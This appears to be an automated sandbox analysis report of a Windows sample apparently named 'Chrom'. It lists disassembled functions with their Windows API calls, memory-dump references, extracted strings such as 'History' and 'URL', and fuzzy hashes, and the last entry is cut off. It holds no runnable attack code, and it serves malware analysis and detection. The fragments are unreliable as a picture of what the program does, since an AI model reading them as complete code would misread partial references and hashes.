                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040AD93
                                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040ADA3
                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040ADB2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$System$File$LocalSpecific
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 979780441-0
                                                                                                                                                        • Opcode ID: 500b3f37a8e27eabcf8092cb1f440f01365611260bcda39269a24c65035c9a43
                                                                                                                                                        • Instruction ID: 31e7aa1bea13d32e7bca6e77574f5e504946d2401e2512c444bffb4365324c75
                                                                                                                                                        • Opcode Fuzzy Hash: 500b3f37a8e27eabcf8092cb1f440f01365611260bcda39269a24c65035c9a43
                                                                                                                                                        • Instruction Fuzzy Hash: A0F0FE769112099BEB119BA0DD49BBBB3FCBB4570BF044439E552E1080EB74D4098B65
                                                                                                                                                        Function 004139EE Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(0045B808,?,00000050,?,00401C6E,?), ref: 00413A08
                                                                                                                                                        • memcpy.MSVCRT(0045B538,?,000002CC,0045B808,?,00000050,?,00401C6E,?), ref: 00413A1A
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00413A2D
                                                                                                                                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_00013704,00000000), ref: 00413A41
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1386444988-0
                                                                                                                                                        • Opcode ID: 4d87169f9d56b17e00e3402c301ad3cb042f0108c164b9bdc7b5e575712afbe5
                                                                                                                                                        • Instruction ID: bbec9d8a740cb9b84f1fef4082fdc1a95378a550d55470654ec0ec15965ea30e
                                                                                                                                                        • Opcode Fuzzy Hash: 4d87169f9d56b17e00e3402c301ad3cb042f0108c164b9bdc7b5e575712afbe5
                                                                                                                                                        • Instruction Fuzzy Hash: 85F027B2640320ABE310BFB5BC06F463AA4F709B1BF114836F600A51D2C3B949558FDD
                                                                                                                                                        Function 0044E1A7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00840048), ref: 0044E1B1
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00850050), ref: 0044E1C1
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00986D88), ref: 0044E1D1
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00850458), ref: 0044E1E1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??3@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                        • Opcode ID: ff29cf86c77b574f117a7c2e416dd39f00a755436dc2afce52489674462316f8
                                                                                                                                                        • Instruction ID: 0040574f82d095680108ff298768a764fab42f46883a413dd34ad4582741df14
                                                                                                                                                        • Opcode Fuzzy Hash: ff29cf86c77b574f117a7c2e416dd39f00a755436dc2afce52489674462316f8
                                                                                                                                                        • Instruction Fuzzy Hash: 46E0197130120006BE2CEB3FA981A2223CC2E61301319883AF900C2282CF28E980802E
                                                                                                                                                        Function 00411855 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 004118BE
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 0041190E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InvalidateMessageRectSend
                                                                                                                                                        • String ID: xr@
                                                                                                                                                        • API String ID: 909852535-3463887390
                                                                                                                                                        • Opcode ID: ba6026d9526b87ee37bd19c55eabe9f4096063d0fb6082bcfa7714a2564ce611
                                                                                                                                                        • Instruction ID: 0293175210dcad0e75e5e34cf014ada8c26fc98d1d87670dbb71c7f4721f3b00
                                                                                                                                                        • Opcode Fuzzy Hash: ba6026d9526b87ee37bd19c55eabe9f4096063d0fb6082bcfa7714a2564ce611
                                                                                                                                                        • Instruction Fuzzy Hash: B761F6307002045BCF20EB658885EEE73E6AF44768F52446BF2595B2B2CB79ADC5CB4D
                                                                                                                                                        Function 0040F295 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • wcschr.MSVCRT ref: 0040F2D7
                                                                                                                                                        • wcschr.MSVCRT ref: 0040F2E5
                                                                                                                                                          • Part of subcall function 0040B0B2: wcslen.MSVCRT ref: 0040B0CE
                                                                                                                                                          • Part of subcall function 0040B0B2: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F32D), ref: 0040B0F1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcschr$memcpywcslen
                                                                                                                                                        • String ID: "
                                                                                                                                                        • API String ID: 1983396471-123907689
                                                                                                                                                        • Opcode ID: 03968bedbba8fd43ed3f28f545e1ed9fa43ac2e70cc11921a3825c77fa5f6545
                                                                                                                                                        • Instruction ID: 10195603321605bd56750b7816c0d0271b844f9ce746ccc2960791535488f280
                                                                                                                                                        • Opcode Fuzzy Hash: 03968bedbba8fd43ed3f28f545e1ed9fa43ac2e70cc11921a3825c77fa5f6545
                                                                                                                                                        • Instruction Fuzzy Hash: DA318371904204EBDF24EFA5C8419EEB7B4EF54324B21417BEC10B76D1DB78A94ACB98
                                                                                                                                                        Function 0040AADB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • wcschr.MSVCRT ref: 0040AB07
                                                                                                                                                        • memcpy.MSVCRT(00000000,00983514,00000000,?,?,00983514,?,?,004041EF,00000000,00000000,0044F6A0,?,?,?), ref: 0040AB53
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpywcschr
                                                                                                                                                        • String ID: A@
                                                                                                                                                        • API String ID: 2424118378-2073013064
                                                                                                                                                        • Opcode ID: 65d1c98ee92e68f8316e26253cac294d40828dc9945de756115462d34a8b6e5e
                                                                                                                                                        • Instruction ID: 830330097a83edb220799b64d51470a873f960a000b5f267707f01fc502e4dd1
                                                                                                                                                        • Opcode Fuzzy Hash: 65d1c98ee92e68f8316e26253cac294d40828dc9945de756115462d34a8b6e5e
                                                                                                                                                        • Instruction Fuzzy Hash: B121CC32910315ABDB259F18C4809BAB3B9EB50354B50453BEE42E73D1E7B8BC61C6DA
                                                                                                                                                        Function 0040C4A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040A8EC: SetFilePointer.KERNEL32(0040C76D,?,00000000,00000000,?,0040C573,00000000,00000000,?,00000020,?,0040C703,?,?,*.*,0040C76D), ref: 0040A8F9
                                                                                                                                                        • _memicmp.MSVCRT ref: 0040C4BB
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C76D,00000000), ref: 0040C4D2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                        • String ID: URL
                                                                                                                                                        • API String ID: 2108176848-3574463123
                                                                                                                                                        • Opcode ID: 8b46189477faf47e70554d53ccdcd0d71d59fab45cca677982259d8f08aed264
                                                                                                                                                        • Instruction ID: e1781fd545be80fe7556f1c298766c282a9e191fb349476702c3e518ab4974fa
                                                                                                                                                        • Opcode Fuzzy Hash: 8b46189477faf47e70554d53ccdcd0d71d59fab45cca677982259d8f08aed264
                                                                                                                                                        • Instruction Fuzzy Hash: 8411E335500204FBEB11EF25CC45F5B7BE8EF42348F004066F904AB292E779EA11D7A9
                                                                                                                                                        Function 0040A912 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _snwprintf.MSVCRT ref: 0040A957
                                                                                                                                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A967
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _snwprintfmemcpy
                                                                                                                                                        • String ID: %2.2X
                                                                                                                                                        • API String ID: 2789212964-323797159
                                                                                                                                                        • Opcode ID: b028d3dd81a9ff72aad3c771905fcdc4d2240dadb792d078678063d252d14bc1
                                                                                                                                                        • Instruction ID: 6a588dd7550e73766d5457c33bdc9f1bb05d6c65df0ab8095161fbe55ab5aab1
                                                                                                                                                        • Opcode Fuzzy Hash: b028d3dd81a9ff72aad3c771905fcdc4d2240dadb792d078678063d252d14bc1
                                                                                                                                                        • Instruction Fuzzy Hash: A2118272A00308BFEB11DFE8C8829AFB3B4FB45714F118476ED14E7141D6389A158B96
                                                                                                                                                        Function 00419B1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,00419D38,?,00000000), ref: 00419B54
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00419B60
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseFileHandleUnmapView
                                                                                                                                                        • String ID: ItA
                                                                                                                                                        • API String ID: 2381555830-3397558953
                                                                                                                                                        • Opcode ID: 78d9621554c737ac66a3f4cb29ee58c3d3362d23627f1abe4208ba6ebade4b46
                                                                                                                                                        • Instruction ID: 8fc27f8f603743712d85b87c8facf7af589576e01e28d81e59fb0ee190f4bb1a
                                                                                                                                                        • Opcode Fuzzy Hash: 78d9621554c737ac66a3f4cb29ee58c3d3362d23627f1abe4208ba6ebade4b46
                                                                                                                                                        • Instruction Fuzzy Hash: B3119A32409710DFCB21AF15E984A96B7E4FF40B22B00082EE592976A1C738FC85CB98
                                                                                                                                                        Function 0040F4EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _snwprintf
                                                                                                                                                        • String ID: %%-%d.%ds
                                                                                                                                                        • API String ID: 3988819677-2008345750
                                                                                                                                                        • Opcode ID: e1797fb05a737fba52aba767bb24c373e33194b62cf47ebf28a73d56ffb6a049
                                                                                                                                                        • Instruction ID: 95e02a5c15eeed1d551906e02850d48b35c8b7aee7daa8271261a5313117e4a6
                                                                                                                                                        • Opcode Fuzzy Hash: e1797fb05a737fba52aba767bb24c373e33194b62cf47ebf28a73d56ffb6a049
                                                                                                                                                        • Instruction Fuzzy Hash: 4601B575600204AFD720AF19CC82D9BB7ADFB4C718B00443EFD46A7692C639F855CB64
                                                                                                                                                        Function 0040B109 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memicmpwcslen
                                                                                                                                                        • String ID: History
                                                                                                                                                        • API String ID: 1872909662-3892791767
                                                                                                                                                        • Opcode ID: d43cc8d850bd4f9d15064c446135e088d8750b77bb674fd7b9a2667d4b21ddf2
                                                                                                                                                        • Instruction ID: 941d79324f8edf167e3c65633afc17faa179ac8f5e09340cfeb8a5c916fb1dc6
                                                                                                                                                        • Opcode Fuzzy Hash: d43cc8d850bd4f9d15064c446135e088d8750b77bb674fd7b9a2667d4b21ddf2
                                                                                                                                                        • Instruction Fuzzy Hash: EFF0A4725082018BD210EE298C41A2BF7E8DF813E9F11093FF8A1A62C2DB39DC4546ED
                                                                                                                                                        Function 0040A838 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileNameSavewcscpy
                                                                                                                                                        • String ID: X
                                                                                                                                                        • API String ID: 3080202770-3081909835
                                                                                                                                                        • Opcode ID: cf50ce10e3d8adb72faeaa0eaa9c5517279bca70dc60290c33b6f594c57b49c2
                                                                                                                                                        • Instruction ID: 6611e8cc3d156157abd2d980a6588325782f281802a6564c3fcb0580a52e3f25
                                                                                                                                                        • Opcode Fuzzy Hash: cf50ce10e3d8adb72faeaa0eaa9c5517279bca70dc60290c33b6f594c57b49c2
                                                                                                                                                        • Instruction Fuzzy Hash: 3201D3B2E002499FDF15DFE9D88479EBBF4EF08319F10842AE815E6280DB789949CF55
                                                                                                                                                        Function 0040E293 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040E2AB
                                                                                                                                                        • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E2DA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSendmemset
                                                                                                                                                        • String ID: "
                                                                                                                                                        • API String ID: 568519121-123907689
                                                                                                                                                        • Opcode ID: aee607dd69faffa0a38dbaa75629dbd7c8e2f222f7178d7bf2009bde8f964298
                                                                                                                                                        • Instruction ID: e50019999580a74d85a60b07338c936db99593caccc9844b50c561b4a2aa9bba
                                                                                                                                                        • Opcode Fuzzy Hash: aee607dd69faffa0a38dbaa75629dbd7c8e2f222f7178d7bf2009bde8f964298
                                                                                                                                                        • Instruction Fuzzy Hash: 3301D179800205EFDB209F9AC841AAFB7F8FF88745F01843EE855A6281E3349855CF79
                                                                                                                                                        Function 00401FEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowPlacement.USER32(?,?,?,?,?,004116D2,?,General,?,00000000,00000001), ref: 00402015
                                                                                                                                                        • memset.MSVCRT ref: 00402028
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PlacementWindowmemset
                                                                                                                                                        • String ID: WinPos
                                                                                                                                                        • API String ID: 4036792311-2823255486
                                                                                                                                                        • Opcode ID: 521b6bf8a0af6af857a236e47d383093fbaed3f27b246b805a3dea25d9df0909
                                                                                                                                                        • Instruction ID: 6104400570af448ab2160dad3ac02d8bcb917da1af1eef173e874a3fdbf9e1c7
                                                                                                                                                        • Opcode Fuzzy Hash: 521b6bf8a0af6af857a236e47d383093fbaed3f27b246b805a3dea25d9df0909
                                                                                                                                                        • Instruction Fuzzy Hash: 06F04F70600304AFEB14EF94C98DF5A33ACAF04700F14007AEA099B1C1D7F8A900CA29
                                                                                                                                                        Function 0040A7D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
